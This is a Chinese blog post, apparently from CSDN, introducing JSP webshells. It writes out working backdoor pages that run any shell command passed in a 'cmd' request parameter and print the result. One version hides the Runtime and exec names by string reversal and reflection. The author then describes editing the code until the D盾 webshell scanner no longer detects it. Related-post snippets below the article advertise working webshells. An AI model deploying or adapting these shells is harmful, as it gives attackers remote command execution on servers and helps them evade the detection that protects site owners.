jsp webshell 初识

于 2024-03-02 22:47:58 发布
阅读量414 收藏 9
点赞数 6
文章标签: java 前端 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50217210/article/details/136424146
版权 
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>
<%
    out.print(System.getProperty("os.name").toLowerCase()); //os.name获取操作系统的类型
    String cmd = request.getParameter("cmd");  //参数cmd
    if(cmd != null){
    Process p = Runtime.getRuntime().exec(new String[]{"cmd.exe","/c",cmd}); //执行命令,使用列表数组的方式
    InputStream input = p.getInputStream(); //获取字节流
    InputStreamReader ins = new InputStreamReader(input, "GBK"); //放入字符输入流,设置编码防止乱码
    BufferedReader br = new BufferedReader(ins);//从字符输⼊流中读取⽂本并缓冲字符
    out.print("<pre>");
    String line;   //定义line变量
    while((line = br.readLine()) != null) {    //遍历
    out.println(line);     //用line接受每个内容
    }
    out.print("</pre>");    //为了在网页中输出
    br.close();
    ins.close();
    input.close();
    }
%>

放到IDEA中webapp下测试一下

访问得到os.name的信息 代码中可以接收参数cmd 我们提供参数看看 cmd=ipconfig

没问题这里(只是我测试的时候没有处理图片,就不放置了)

<%@ page import="java.lang.reflect.Method" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>

<%
    class c=class.forname("java.lang.Runtime");
    Method r=c.getDeclareMethod("getRuntime",null);
    Method e=c.getDeclareMethod("exec",String.class);
    Process process = (Process) e.invoke(r.invoke(null,null),"calc");

%>
把test中的修改一下就好了 同样可以得到效果

之前是执行exec参数,这次是可疑文件

<%@ page import="java.lang.reflect.Method" %>
<%@ page import="jdk.internal.util.xml.impl.Input" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.IOException" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>

<%!
  public static String revstr(String str){
    String line = "";
    for (int i=0;i<str.length();i++){
      line = str.charAt(i) + line;
    }
    return line;
  }
%>
<%
  String cmd = request.getParameter("cmd");
  if (cmd!=null){
    try{
      Class c = Class.forName(revstr("emitnuR.gnal.avaj"));
      Method r = c.getDeclaredMethod(revstr("emitnuRteg"),null);
      Method e = c.getDeclaredMethod(revstr("cexe"),String.class);
      Process process = (Process) e.invoke(r.invoke(null,null),cmd);
      InputStream inputStream = process.getInputStream();
      InputStreamReader is = new InputStreamReader(inputStream,"GBK");
      BufferedReader br = new BufferedReader(is);
      StringBuffer sb = new StringBuffer("<pre>");
      String line;
//            line=br.readLine();
      while ((line=br.readLine())!=null){
        sb.append(line+"\n");
      }
      out.print(sb+"</pre>");
      br.close();
      is.close();
      inputStream.close();
    }catch (IOException e){
      e.printStackTrace();
    }
  }
%>

<%
  out.print(revstr("java.lang.Runtime"));
  out.print("<br>");
  out.print(revstr("getRuntime"));
  out.print("<br>");
  out.print(revstr("exec"));
%>

在D盾跑还是被检测到了,

很有可能是字节输出的代码被检测到了,我们删除了看一下。

果然,删除以后检测不到了,那我们想办法绕过

换一种方式输出字节流

    InputStream input = p.getInputStream(); //获取字节流
    InputStreamReader ins = new InputStreamReader(input, "GBK"); //放入字符输入流,设置编码防止乱码
    int a=-1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=input.read(b))!=-1){
      out.print(new String(b));
    }
    out.print("</pre>");
    input.close();
    //修改成这样

成功绕过

在VT上测一测

云棋
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jsp webshell
02-19
根据by 慈勤强 JFolder改编,完善了部分功能有bug的地方。
JSPwebshell
08-21
忍痛分享啊。
webshelljsp免杀
tomyyyyy
11-26 2546
webshelljsp免杀 转载自webshell免杀研究 原理 向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。 结构 实现三步 数据的传递 执行所传递的数据 回显 数据传递 String x = request.getParameter("x"); 执行所传递的数据 Class rt = Class.forN...
JSPWebShell
weixin_34414650的博客
07-26 620
2019独角兽企业重金招聘Python工程师标准>>> ...
Javaweb安全——JSP Webshell
weixin_43610673的博客
08-22 6142
public static class x extends ClassLoader //继承ClassLoader {#恶意类字节码 BASE64Decoder code = new sun . misc . BASE64Decoder();//将base64解码成byte数组,并传入自定义类的get函数 System . out . println(result . newInstance());}.
JSP webshell学习
公众号shadow sock7
10-10 1243
参考: JSP-Webshells集合 都0202年了老嗨还在用的 - 各种姿势jsp webshell 原理总结 使用com.sun.org.apache.bcel.internal.util.ClassLoader加载BCEL格式的字节码 自定义ClassLoader,在findClass方法中硬编码类的字节码的base64,然后loadClass 利用new ScriptEngineManager().getEngineByName(“nashorn”)#eval执行任意代码 使用URLClas
jspwebshell.txt
04-07
jspwebshell.txt
en.rar_jsp webshell
09-19
en.jsp 操作服务器文件命令 俗称webshell
jsp webshell cmd
10-18
**JSP Webshell CMD:深入理解与安全防范** 在网络安全领域,"jsp webshell cmd" 是一个关键术语,它涉及到Web应用程序的安全性,尤其是Java服务器页面(JSP)中的潜在漏洞利用。Webshell通常指的是攻击者在成功...
jsp webshell JspSpy.jsp
04-19
jsp webshell jspspy 修复部分操作系统下乱码问题。
两个JSP Web Shell
03-23
NULL 博文链接:https://sheng.iteye.com/blog/1033770
script webshell jspWebShell / pythonWebShell / phpWebShell
03-24
NULL 博文链接:https://lindows.iteye.com/blog/1076021
JSP-Webshells全套汇总
09-29
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
JSPWEBSHELL源代码
11-21
上传或是用其他方式注入到别人系统,用此webshell攻击别人系统,提供各种网络协议的连接
JSP webshell免杀——webshell免杀
weixin_46601374的博客
06-29 3473
好搞笑,我身边的人省护期间天天提到许少,听说是一个很厉害的大佬。结果我免杀跟着学的视频就是这位大佬的。更离谱的是,聪哥说我们是见过许少的,就是上次给红队整理报告的时候,他就在。果然,实习就是好,传说中的大佬们就在身边——虽然我都不认识,但是还是感觉好厉害。来吧,开始学习免杀首先就是最简单的一句话木马: 太容易被发现了而且在我写代码的时候电脑的病毒和威胁防护就已经开始反应了现在将这一句话木马,分开来写 沙箱是通过了✌但是cmd=ipconfig是什么都不出的,netstat -ano也是。 再次修改代码中间
认识JSP webshell免杀
最新发布
xlsj雪松的博客
08-19 1036
Tomcat运行这就是一个典型的webshell,但这个webshell的各种特征已经被安全检测平台记录,很容易识别出来。【D盾】【shellpub】接下来进行免杀,免杀就是将这些被识别的特征进行替换,绕过,混淆和干扰。
webshell -真实可用的jsp
03-30
网上很多一句话、webshell 各种原因导致不能用,亲测可用的大马,忍痛割爱与大家分享
Jsp Webshell request.get木马的特征?
07-12
JSP Webshell 是一种基于 JSP 技术的恶意软件,它被用来在受感染的服务器上执行恶意操作。针对 request 对象的一些常见攻击模式和特征包括: 1. 非法的请求参数:Webshell 可能会使用非法的请求参数来执行恶意操作,例如包含特殊字符、路径遍历、SQL 注入等。 2. 异常的请求路径:Webshell 可能会使用异常的请求路径,例如使用不存在的 JSP 文件名或路径,以触发服务器的异常处理逻辑。 3. 隐藏的请求参数:Webshell 可能会使用隐藏的请求参数,这些参数可能不会在正常请求中出现,但可以触发特定的恶意操作。 4. 远程命令执行:Webshell 可能会通过 request 对象执行远程命令,例如执行系统命令、读取文件内容、连接到远程服务器等。 5. 文件上传漏洞利用:Webshell 可能会利用文件上传漏洞,通过 request 对象上传恶意文件到服务器,并在上传后执行其中的恶意代码。 6. 对 Web 容器的漏洞利用:Webshell 可能会利用 Web 容器(如 Tomcat、Jetty 等)的漏洞,通过 request 对象执行恶意操作。 7. 加密/编码:Webshell 可能会对请求参数进行加密或编码,以避免被检测到。 这些特征只是一些常见的示例,实际上,Webshell 的形式和特征会因攻击者和具体的攻击方式而有所不同。为了保护服务器安全,建议采取安全措施,如及时更新软件、限制文件上传、过滤恶意请求参数等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值